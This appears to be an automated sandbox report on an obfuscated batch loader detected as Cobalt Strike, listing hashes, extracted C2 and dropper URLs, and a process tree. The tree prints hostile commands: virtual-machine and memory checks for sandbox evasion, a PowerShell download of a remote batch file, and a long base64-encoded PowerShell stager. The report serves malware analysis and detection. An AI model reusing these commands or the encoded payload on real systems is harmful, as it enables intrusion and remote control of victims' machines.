cobaltstrike | 30ca15e0c27b369f12598b23f6e56ab3326ab02f124470bc455c3f85a91a23d1

Analysis

max time kernel
227s
max time network
275s
platform
windows10-2004_x64
resource
win10v2004-20240221-en
resource tags

arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
submitted
23/02/2024, 10:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

loader_obf.bat
Size

3.6MB
MD5

6531b28786be30434acd8a1f96529f4e
SHA1

fde3b17e4f2be4a42f5a1eaf1dbcd7024b50b171
SHA256

30ca15e0c27b369f12598b23f6e56ab3326ab02f124470bc455c3f85a91a23d1
SHA512

97b7b9c302d39b38ec933b780701499716dacf0428c1763e2b90067877d063666b71253c4f74f1e776b15054a1af35cbfdfd98c23536b3b5e797f67d0d998ffa
SSDEEP

6144:7194tl15KgM8/kaMfORd2PKXFasv/Spat2H0P3kL3d2yUY2E:S+gM84O8uawxt3ke8

Score

10^/10

cobaltstrike backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/partymonster2/Batch-Scripts/main/explorer.bat

Extracted

Family

cobaltstrike

http://192.168.158.132:443/SmYD

Attributes

user_agent
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 2.0.50727)

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	4412	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
17	raw.githubusercontent.com
18	raw.githubusercontent.com

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
2696	PING.EXE
3092	PING.EXE
512	PING.EXE
2064	PING.EXE
2392	PING.EXE
4040	PING.EXE
1932	PING.EXE
4456	PING.EXE
2268	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
3040	powershell.exe
3040	powershell.exe
1236	powershell.exe
1236	powershell.exe
3416	powershell.exe
3416	powershell.exe
4852	powershell.exe
4852	powershell.exe
8	powershell.exe
8	powershell.exe
1988	powershell.exe
1988	powershell.exe
4412	powershell.exe
4412	powershell.exe
3232	powershell.exe
3232	powershell.exe
440	powershell.exe
440	powershell.exe
1272	powershell.exe
1272	powershell.exe
4664	powershell.exe
4664	powershell.exe
972	powershell.exe
972	powershell.exe
4340	powershell.exe
4340	powershell.exe
2352	powershell.exe
2352	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeIncreaseQuotaPrivilege	3040	powershell.exe
Token: SeSecurityPrivilege	3040	powershell.exe
Token: SeTakeOwnershipPrivilege	3040	powershell.exe
Token: SeLoadDriverPrivilege	3040	powershell.exe
Token: SeSystemProfilePrivilege	3040	powershell.exe
Token: SeSystemtimePrivilege	3040	powershell.exe
Token: SeProfSingleProcessPrivilege	3040	powershell.exe
Token: SeIncBasePriorityPrivilege	3040	powershell.exe
Token: SeCreatePagefilePrivilege	3040	powershell.exe
Token: SeBackupPrivilege	3040	powershell.exe
Token: SeRestorePrivilege	3040	powershell.exe
Token: SeShutdownPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeSystemEnvironmentPrivilege	3040	powershell.exe
Token: SeRemoteShutdownPrivilege	3040	powershell.exe
Token: SeUndockPrivilege	3040	powershell.exe
Token: SeManageVolumePrivilege	3040	powershell.exe
Token: 33	3040	powershell.exe
Token: 34	3040	powershell.exe
Token: 35	3040	powershell.exe
Token: 36	3040	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeIncreaseQuotaPrivilege	1236	powershell.exe
Token: SeSecurityPrivilege	1236	powershell.exe
Token: SeTakeOwnershipPrivilege	1236	powershell.exe
Token: SeLoadDriverPrivilege	1236	powershell.exe
Token: SeSystemProfilePrivilege	1236	powershell.exe
Token: SeSystemtimePrivilege	1236	powershell.exe
Token: SeProfSingleProcessPrivilege	1236	powershell.exe
Token: SeIncBasePriorityPrivilege	1236	powershell.exe
Token: SeCreatePagefilePrivilege	1236	powershell.exe
Token: SeBackupPrivilege	1236	powershell.exe
Token: SeRestorePrivilege	1236	powershell.exe
Token: SeShutdownPrivilege	1236	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeSystemEnvironmentPrivilege	1236	powershell.exe
Token: SeRemoteShutdownPrivilege	1236	powershell.exe
Token: SeUndockPrivilege	1236	powershell.exe
Token: SeManageVolumePrivilege	1236	powershell.exe
Token: 33	1236	powershell.exe
Token: 34	1236	powershell.exe
Token: 35	1236	powershell.exe
Token: 36	1236	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeIncreaseQuotaPrivilege	3232	powershell.exe
Token: SeSecurityPrivilege	3232	powershell.exe
Token: SeTakeOwnershipPrivilege	3232	powershell.exe
Token: SeLoadDriverPrivilege	3232	powershell.exe
Token: SeSystemProfilePrivilege	3232	powershell.exe
Token: SeSystemtimePrivilege	3232	powershell.exe
Token: SeProfSingleProcessPrivilege	3232	powershell.exe
Token: SeIncBasePriorityPrivilege	3232	powershell.exe
Token: SeCreatePagefilePrivilege	3232	powershell.exe
Token: SeBackupPrivilege	3232	powershell.exe
Token: SeRestorePrivilege	3232	powershell.exe
Token: SeShutdownPrivilege	3232	powershell.exe
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeSystemEnvironmentPrivilege	3232	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2740 wrote to memory of 532	2740	cmd.exe	87
PID 2740 wrote to memory of 532	2740	cmd.exe	87
PID 2740 wrote to memory of 2064	2740	cmd.exe	88
PID 2740 wrote to memory of 2064	2740	cmd.exe	88
PID 2740 wrote to memory of 3168	2740	cmd.exe	89
PID 2740 wrote to memory of 3168	2740	cmd.exe	89
PID 2740 wrote to memory of 3040	2740	cmd.exe	93
PID 2740 wrote to memory of 3040	2740	cmd.exe	93
PID 2740 wrote to memory of 2392	2740	cmd.exe	96
PID 2740 wrote to memory of 2392	2740	cmd.exe	96
PID 2740 wrote to memory of 4392	2740	cmd.exe	95
PID 2740 wrote to memory of 4392	2740	cmd.exe	95
PID 2740 wrote to memory of 2976	2740	cmd.exe	97
PID 2740 wrote to memory of 2976	2740	cmd.exe	97
PID 2740 wrote to memory of 4040	2740	cmd.exe	98
PID 2740 wrote to memory of 4040	2740	cmd.exe	98
PID 2740 wrote to memory of 3176	2740	cmd.exe	99
PID 2740 wrote to memory of 3176	2740	cmd.exe	99
PID 2740 wrote to memory of 1236	2740	cmd.exe	100
PID 2740 wrote to memory of 1236	2740	cmd.exe	100
PID 2740 wrote to memory of 1932	2740	cmd.exe	101
PID 2740 wrote to memory of 1932	2740	cmd.exe	101
PID 2740 wrote to memory of 4660	2740	cmd.exe	102
PID 2740 wrote to memory of 4660	2740	cmd.exe	102
PID 2740 wrote to memory of 2628	2740	cmd.exe	103
PID 2740 wrote to memory of 2628	2740	cmd.exe	103
PID 2740 wrote to memory of 960	2740	cmd.exe	104
PID 2740 wrote to memory of 960	2740	cmd.exe	104
PID 2740 wrote to memory of 3416	2740	cmd.exe	105
PID 2740 wrote to memory of 3416	2740	cmd.exe	105
PID 2740 wrote to memory of 628	2740	cmd.exe	106
PID 2740 wrote to memory of 628	2740	cmd.exe	106
PID 2740 wrote to memory of 2696	2740	cmd.exe	107
PID 2740 wrote to memory of 2696	2740	cmd.exe	107
PID 2740 wrote to memory of 4512	2740	cmd.exe	108
PID 2740 wrote to memory of 4512	2740	cmd.exe	108
PID 2740 wrote to memory of 3092	2740	cmd.exe	109
PID 2740 wrote to memory of 3092	2740	cmd.exe	109
PID 2740 wrote to memory of 3708	2740	cmd.exe	110
PID 2740 wrote to memory of 3708	2740	cmd.exe	110
PID 2740 wrote to memory of 4852	2740	cmd.exe	111
PID 2740 wrote to memory of 4852	2740	cmd.exe	111
PID 2740 wrote to memory of 8	2740	cmd.exe	112
PID 2740 wrote to memory of 8	2740	cmd.exe	112
PID 2740 wrote to memory of 1988	2740	cmd.exe	114
PID 2740 wrote to memory of 1988	2740	cmd.exe	114
PID 2740 wrote to memory of 3656	2740	cmd.exe	115
PID 2740 wrote to memory of 3656	2740	cmd.exe	115
PID 2740 wrote to memory of 4292	2740	cmd.exe	116
PID 2740 wrote to memory of 4292	2740	cmd.exe	116
PID 2740 wrote to memory of 1724	2740	cmd.exe	117
PID 2740 wrote to memory of 1724	2740	cmd.exe	117
PID 2740 wrote to memory of 4412	2740	cmd.exe	118
PID 2740 wrote to memory of 4412	2740	cmd.exe	118
PID 2740 wrote to memory of 3760	2740	cmd.exe	119
PID 2740 wrote to memory of 3760	2740	cmd.exe	119
PID 2740 wrote to memory of 4456	2740	cmd.exe	120
PID 2740 wrote to memory of 4456	2740	cmd.exe	120
PID 2740 wrote to memory of 3420	2740	cmd.exe	121
PID 2740 wrote to memory of 3420	2740	cmd.exe	121
PID 2740 wrote to memory of 3232	2740	cmd.exe	122
PID 2740 wrote to memory of 3232	2740	cmd.exe	122
PID 2740 wrote to memory of 3504	2740	cmd.exe	123
PID 2740 wrote to memory of 3504	2740	cmd.exe	123

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\loader_obf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2740
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\loader_obf.bat"
  2⤵
  PID:532
- C:\Windows\system32\PING.EXE
  ping -n 1 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:2064
- C:\Windows\system32\find.exe
  find "Pinging"
  2⤵
  PID:3168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 8) {"Less than 8GB";spps -f -n "cmd" -ErrorAction SilentlUsuNuLlBXqemwgaQw%wKgftbquThYcwlBlE%XPnNlccgeHLSNGYYq%TvwVMoaxvfsDMfTLZ%rWajoRARWlBsZrJuX%SpfuWyLdpaocDDlLp%ssEMmeRfpjAzyLsCh%bdthNqewmmqQvRNij%pGaCZnchAwAjAildjI%ssaVvdqAAbvnJom%GXOevvNpgwzPZcnkIX%toYtvuDppEuINxBQ%thbiuyiazyxDnNpu%ELFmCuUValKrYukSxEglfiiE}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3040
- C:\Windows\system32\find.exe
  find "Pinging"
  2⤵
  PID:4392
- C:\Windows\system32\PING.EXE
  ping -n 1 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:2392
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\loader_obf.bat"
  2⤵
  PID:2976
- C:\Windows\system32\PING.EXE
  ping -n 1 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:4040
- C:\Windows\system32\find.exe
  find "Pinging"
  2⤵
  PID:3176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 8) {"Less than 8GB";spps -f -n "cmd" -ErrorAction SilentlywNVzBYQhuLfZUZVGSi%vGmfYkYgibnzjGe%APRuYYtifVbMOVAYFb%TlEUhqalKFFGhGv%kcYlumIaZcMhrgzK%xeFgeHSpCfWNKjmYWj%gCUIdpgmMuDFjeLY%BuWimIggwyjRmdiqg%fZWDuwGcmZneZacH%VdEtFmfwoNzOXEjo%mArGspBGZpqpbPCInTf%ZDuitjikPaVseqGVeuP%UXSgmsMHOlTgIVjdHKJRmNWYTOK}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1236
- C:\Windows\system32\PING.EXE
  ping -n 1 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:1932
- C:\Windows\system32\find.exe
  find "Pinging"
  2⤵
  PID:4660
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\loader_obf.bat"
  2⤵
  PID:2628
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3416
- C:\Windows\system32\mshta.exe
  mshta
  2⤵
  PID:628
- C:\Windows\system32\PING.EXE
  ping -n 1 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:2696
- C:\Windows\system32\find.exe
  find "Pinging"
  2⤵
  PID:4512
- C:\Windows\system32\PING.EXE
  ping -n 1 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:3092
- C:\Windows\system32\find.exe
  find "Pinging"
  2⤵
  PID:3708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\loader_obf.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:8
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\system32\doskey.exe
  doskey /listsize=0
  2⤵
  PID:3656
- C:\Windows\system32\forfiles.exe
  forfiles /p C:\Users\Admin\AppData\Local\Temp /m BAT_DLL.exe /c 'cmd /c start @file'
  2⤵
  PID:4292
- C:\Windows\system32\mshta.exe
  mshta
  2⤵
  PID:1724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/partymonster2/Batch-Scripts/main/explorer.bat', 'C:\Users\Admin\AppData\Local\Temp\explorer.bat')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4412
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\loader_obf.bat"
  2⤵
  PID:3760
- C:\Windows\system32\PING.EXE
  ping -n 1 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:4456
- C:\Windows\system32\find.exe
  find "Pinging"
  2⤵
  PID:3420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 8) {"Less than 8GB";spps -f -n "cmd" -ErrorAction SilentlFXnAVQfqeAmmpWHa%OYuwfAtJEuLixCUATgf%GjRqsROcvgdMBmjIm%oiuARtufsUdoRRCWj%WYeynnIZlpWESbvO%tvrLBUxMpaMMXEtgFXI%ACiRSGifPcoCFVB%qzugnkvVmGUCqJqXQ%ZTiFfrUWbwcHtheGiMx%avTTicfeWtSmZJVq%MrcIlbPynwYNZLgtDwB%FkGUkszmBpRHALJjUZ%YOLzPnryaICHHbsZgl%TlVUjWgzlhwpQiOpUCnqIAgP}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3232
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\loader_obf.bat"
  2⤵
  PID:3504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\loader_obf.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:440
- C:\Windows\system32\PING.EXE
  ping -n 1 -w 700 www.google.com
  2⤵
  - Runs ping.exe
  PID:512
- C:\Windows\system32\find.exe
  find "Pinging"
  2⤵
  PID:1572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\Admin\AppData\Local\Temp\loader_obf.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1272
- C:\Windows\system32\doskey.exe
  doskey /listsize=0
  2⤵
  PID:2012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADIAZwBKAFUAQQBpAEwARABTAGEAOABVAFUAdgBQAFkAVABWAGcAcwA1AGcAOQBMADQAcgBLAGQAZwBFAEYANQBZAFcAcQBzAHIARgA1ADAALwA5ADkAeQBnAGIAUwA2AGUAbgAwAFQARQBzAHoAawBaAEMAcgA3AEwAcgAzAG4AagBwADMAagBRAEgAWgBvADgARQBJAHMAcABqAG0AMgBWAEIANABuAEUATgBDAGsAZQBjAEsANAB2ADMAOQBKAG4AQQB0AGwAcQB5AFQAeABkAHMAVwBzAGoAZQBmAGUATgBZAGIAcwBHADAAQwBLAFIAWAArAHYAcgA4AGIAQQBRAEkAYwBJAGYAcwBsAEIATwBUAE4AOABlAHcAQQB3ADcAeQBRAGIAcABLAEQAMABBADQASQB6AE4AMwBkADMAZAArAGwAcgB3AEsAWABnAGcAMQA4AGMAdwBGAEQASQBYAHgAegBJAE4AdAA1AE4AaABXACsAQwB0AGsAWAB4AGYAZQBiAG4AZwBPAFEAKwAvAHIASABIADQAMgBBAEUATwBpAHkAeQA3ADcAUQBnAFUAeQBoAEYARABvAG0AUgBwAEIAbQBjADgASQAvAGgAYwBVAE8ARQB2AGcANABOAFAAZgBRAFkAcwBMAGYAdwBwAGUAMwBRAGcAZAA3AEoAcwBEAFgAWQAzAEUARABXAEQAdAArAEMAOABXADEAawAyADgARAB6AHcATABKAEQAUQBxAEcAagB4AEgATABaAHYANwA2AEsANQBOADcAZQBTAHkALwBGAGwAcgBIAEEARwBDAGEAegBSAGcAeABaAGQAQQBwADIAQgBoAG4AYwBzAEsAMwBYAEcASgB3AEcAdgBzAHcAbQA5AEcAUQBSAFQAegBxAGIAVgBoAGgAZwBWAHgASgBMAE0AeABTADkASABvAEsAWAByAHQAZwB6ACsAUwB1AE4AOQB2ADYAZwBOAC8AagAxADUAZABNAHQARgA1AGsAcwBoAG0AKwBIAEgARgB1AGwAQQB1AEgAbQBiAHoAdwBrAHQAaAA3AGUAWAAwAFYALwBuAHgASABNAHcAbABjAGgAaAB4AFkAVQBGADAARwBpAGUAYwBiAGsASQBUAEkAZwByAFQAUQBCAGEANgBOADQAUQBSAHUAdQBGAGkARwBjAHAAKwA1ADIAMAB5AE8AZwB5AEMAUQBCAGMAUQBWAGIAbABpADQAWABPAGcAZABZAFAAYQBMAEcAMgBDAGMANQAzAHAAZgBmAGwAZgB2AGEAMQBhAEgAcAB4AHUANQB2AHkAdQBVAC8AUwBqAEUAVAA0ADAAWQB5AGUAVwB2AE0AZgBFADcAZABHAGgAcAAzAEYAegBVADgAZQB2ADgAaABQADUARABjAE8AWAA0ADMAMAA4AEIAbAByAHYALwA5AGwAbQBvADIAaABEAEQATABXAEQAdwBqAFgARgArAFAAOABUAHEALwBkADMAZABTADcAcQBFAC8ARAA3AFoAawBVAGQAUgBLAHYAZABWAEsATwBVAEYAagBZAE0AQQB6AEMATgB4ADQAcwA0AHAAQwBXAEQAdQA5AGIAdAAvAEwAbQBaAHYAawBqAFQALwBTADAAWABsAG0AOQBSAFYANQB1AEsAZQBDADQANgB2AHcAcwB2AGMAUQAvAGIAcgAvAFYAMwB1AC8AaABvADkAeQBmAHMAMwBNADAARABZAGgAaQBUADUALwB1AHQAcwBhAE0ASQBOAGMAbQBFAHoAZABvAEcARAByAEYAdgBBAFoAegAvAHoARwBkAHgAZwBtAFAASgBSAHUAQgAzAFQATwBjADUAcwA1AHYAbwBCADIAcwAwAHIATwA1AG0ARQAwAEoAZQBmAHgAVgBvAE8AWQB1ACsAeQB6AHgAZAB3AGkAcwBYADkAVABqAGsAcQBIAGgASwA1AEgAOABGAGMAZgBKAGoATgBxAEsANABHAEgAYwA3AGYAWgBjAC8ARAA5AE0AdQBHAHAAeABtADgAbgBiADYAbQBWAG4AeQB6AG4AdQB5AFQAVwBHADUAZwBRAEcAbABlAEcAQQBVADgAegA2ADIAOABZAEUAQwBBAG8AWgAwAFgARgBKAGUAaQA2AHkAYwBsAFkARgA2ADYAegBIAHkASABxAHcAVwBZAEkAUQB0AFEAZABsAFAAMwBtAHYAdQBFADAAcQB2AHAAaAB1AGYAeQBqAEEAawBzADcAbAAxAE8AdwA5AFQAdwBvAFkAVQBBAFQAbABqAEoAQwAxADEAawB3ACsAZgBZAFEATgBzAGIAaABNAHkAbgBuAEQAUQBBAHgAagB6AGwAdQBLAGEAUQArADQAUwAvAFMAYgBnAHcAVwBCAEkAegB4AE0ANwAvAGUAMwB6AGsAQwBnAFoAawBxAHUATgBqADYAUABEAFQAYQBSAFYAcQBZADcARABsAE4AZQBlAGEAVQBXAG0ANABnAFMAMgAwAE0ALwA4AEIAOQBpADEAUABMAGsAbQBSAGMASABVAGoANgBRAE4AbwBIAGcAQQBHADkAbABoAGUAbQBDAFAAQwBlAEYAMwBMADUASAA4AEsAdgBQADgATgAzAG8AOABsADUAZwBlAFkARABRAEsAdgBqAHMAeQBtAGkAYQBoAHUAZQBFAEcALwBWAEEASABPAEQAawBWAG4AWABvAHoAaABVAFgAagBLAEoAUwBuADQAOABoAHkAegBKAEoAZABTAE4AVgBiAFMAYgByADYAKwBFADUAMwBTAFMAaABnAFgAYQBoAFAAUABlAFEAWQBVAHkAaABVAGoAcgBYAEgAWgBqAEMAUQBHADIANgBnACsARwBzAGkAeAB0AGwAZgBGAFgAcgB4AHkAOQBjAGgAeQA1ADYAUQBWAHQAagB0AEEAMwBrAFYAagBNAGYAQwBzAEsAUwBQAEgAYgBxAHYASgA5AHgATgBMAHAAQgBSADMAcwBHAC8AdQBCAGsAYwBRAEQAZgBiADcAcQBOADUAWQB4AHEAMgBSAEkAZwA2AFEAagBLAHAASQBEAFEAYgBQAFoANwBlAE4ATABJAGYATABqAFkAZgBlAGEAbABJAG4AYQBxAGkAMwBQAFUAeAByAC8AVQBaADcATQBRAE4AbwBmADAAeAB0AEIAVQA2AGwAYgBMAGQAQQBQAEQAaABiADgAbwA0AE0AUgBlAGkAdABUAHYAcABSAEQAVQBlAEsAdgBRAGcAdAAyAGUAbAA3AGIAWgBsAHgAMgBYAG4AUQBDAG4AegBTAEMAbwBhAGoAVgBUAEEANABEAGgAdwBWAFYAWABaAGgAYwA4ADUANgBvAGQAcAA1ADYAdgBiAEYARgBYAGoAQwBaAGcAMgBtADgAdgBZAHgAcwBiAFUANgBiAGsATwBRADcATQAvADEAWgBJACsATwBEAFUAZwBTAE8AeQB2AE8AUABwAFQASwBNAGwAegAwAGEAaQB2AFgAUgAzAEEAUgBiAE0AOABuAEgAVgBuADIAdQBRAG4ARgBIAG4AOABmAGUASgByAGwAVQAwAGsALwBXADUAdgBEAFkAUQAvADgAOABzAHcANABsAFAAdgBUADIAWAByAEoAdQBTAG0ARABJADIAbQBiAE0AagBGAFcAUABnADcAbgB5AHUAdwBnAGoAZABZAGsAeABSAGEAMgBPAFUAWQA5AHcAWQBrAHMAcwBYAGQAZQArAFkAZQAxAFAAVAArADIAcABKAEgAWgBwAHcAMQArAFYAdwBtAFQAWQA5AEIARABUAG4AVwBMADEAUABoADYAegB1AG4ARgBoAHYASABNAG4ALwAyADEAMwBUADgAKwBWAGUAMgB6AEcATABmADkAQwBwAEEASgA0AHIAeABHADMARgBZAHQANABkAGkAYQAwAFgAMABMAEQAbAAxAHIAMgBVAGEATwB0AFIATwBiAGsANwAxAFYAZAA0AEoAagBsAFcATwB2AGQAUABWAGUAZgB4AG0AUgBJACsAdQB2AFIANABtAGQAMABtAEYAdgB5AE4AcQBZADIAegBnAGUAcQBZADUANAA5AGQAagB6AE4AWABMAG0AYQB4AHkAQwBaAFMAcABYADQAcgArAEgAQgBUAGwAVQA2AG0AZABMADAAcQBNAEUAUwAyAFEAdAArAHUAcwBtAG0AdABVAFcAKwBsAG4AMABBADQAMwA2AHAASgBMAGcASgBOAEwAdwBSAEgAMwA1AGkAYQA5AEgANgBrAEUAagBYAFIAVgBwACsAMQBqAHUAYwByAG0AVABaAHIAVwBxADgAagBvAGUAegBjAGUAVABOAG4AMQBhAHMAMwBJAHgAWQBuADIAdgAyADYAdwB2AHMAQgAzAHAANQA4AGgANQBXAG4AZwBOAHYAOQBlAHYATAB3AGEAbgBaAGIASABqAEYARgB0ADEAMQB4ADUAUQB4ADEAeAAzAHoASABXAHgARwBqADgAcwBkADMAZwBUAHgAYgBUAGUASwBZAHAAdABzADQAYQBqAGwAcgBUAGoALwBjAHIAMQBOADYAVwA1AHkAdAB2AGcAcQBHAGcAeQB6ACsAeAAyAHEANgBxADAASABrADkAdwBhADcAZwA2AFQARAByAFQAdQBiAFYAVwB4AEsAcQAyAG0AUABtAGoAYQBVAG4AVgAyAHEAZgBTAFYARABrAHgAWgBkAHEAcQBUAHMAZgBZADcAbwA5AG4AOQBVADUASAAwAFEATwByADQAegB0AEsAUgBQAFYAVwB0AEcAMwBhAEwAVgArAGYAbABLAEwAWgBUAE4ARwBaAGYAZABJAFcAegBVAGwAcgBwAFUAagAyAHgARABqAFkAaQBiADUAVQBSADAAZgBSAGQASABPAHgAbABoAFQAeABPAGIAVABHADIAcQBRADUAMABmAFQAMgBUAHAAdQAxAEoAdQBQACsAQQBCADMAMgB4AFEAVQBnAGkALwBvAFIAdwA5AEwANgB3AFMAYgBUADgAZgBsAEUAbgBvAFoANwBVAHAAOQAyADYAawBxAGwAZgBCAGkAWABaAC8AUABpAHUAbQBVADMAcAA0ADEAagBlAEYAQgBFAHcAeAArAHUANABkAFMAcABrAEoANAB1AGgAZwBlAG8AeABIAEoAdgBkAC8AYQAyAHAAagBKAGQAMQB1AGIATgBZAGUAQgAwAHgARQBFAFgAZABhAE0ASwBVAGUAZgB6AGsARgBCAEQASwBvAGEAcQBKAFAAdABMAHYAUQBoAG8AcgB6AFMAcgByAGgAYgBMADcAVQBPADcAVgBFAGIAQgBaAG0AVABEAGEARgA0AFQAcQA5AHUAQgBmAFAAYgAxAG8AbAB4AFMAcQAxAFEAeQBOADcAUgB2AEEATgBFAHEAUABzAG4AWQAwAEMAZgBtAFcAZwBkAFYAdQBWAHAANwBHAEUANwBnADMAagBrAFkAMwBXAFUAdwBEAFYAZQBIAEsAdQBpAE4AMQB2AE4ASgB1AEoAdABRAHUAQgAvAFUARAAyAGkAMgBhAGUARwBhAFcAegBGAHAAMgAwAFoAcQBkAEgANABBAFMARgBLAHIAbwA5AFYANABKAHgAcwBUAHEAWABFAE8AeQBtADUAcAB5AGUAbwA3AEwASgBXAFcATQBkAGkAYQBIAGkAOQBTADQAbQBnAFAAbABuAEoAcwBtAE4AMwBUAGcATQB4AEwANAAyAE4AOQBQAHoANABjAGUATQB0AEQAcgBqADEAYwBiAEoAZABKAFQARgBGAEQAOQBnADgAOABuADcAWAA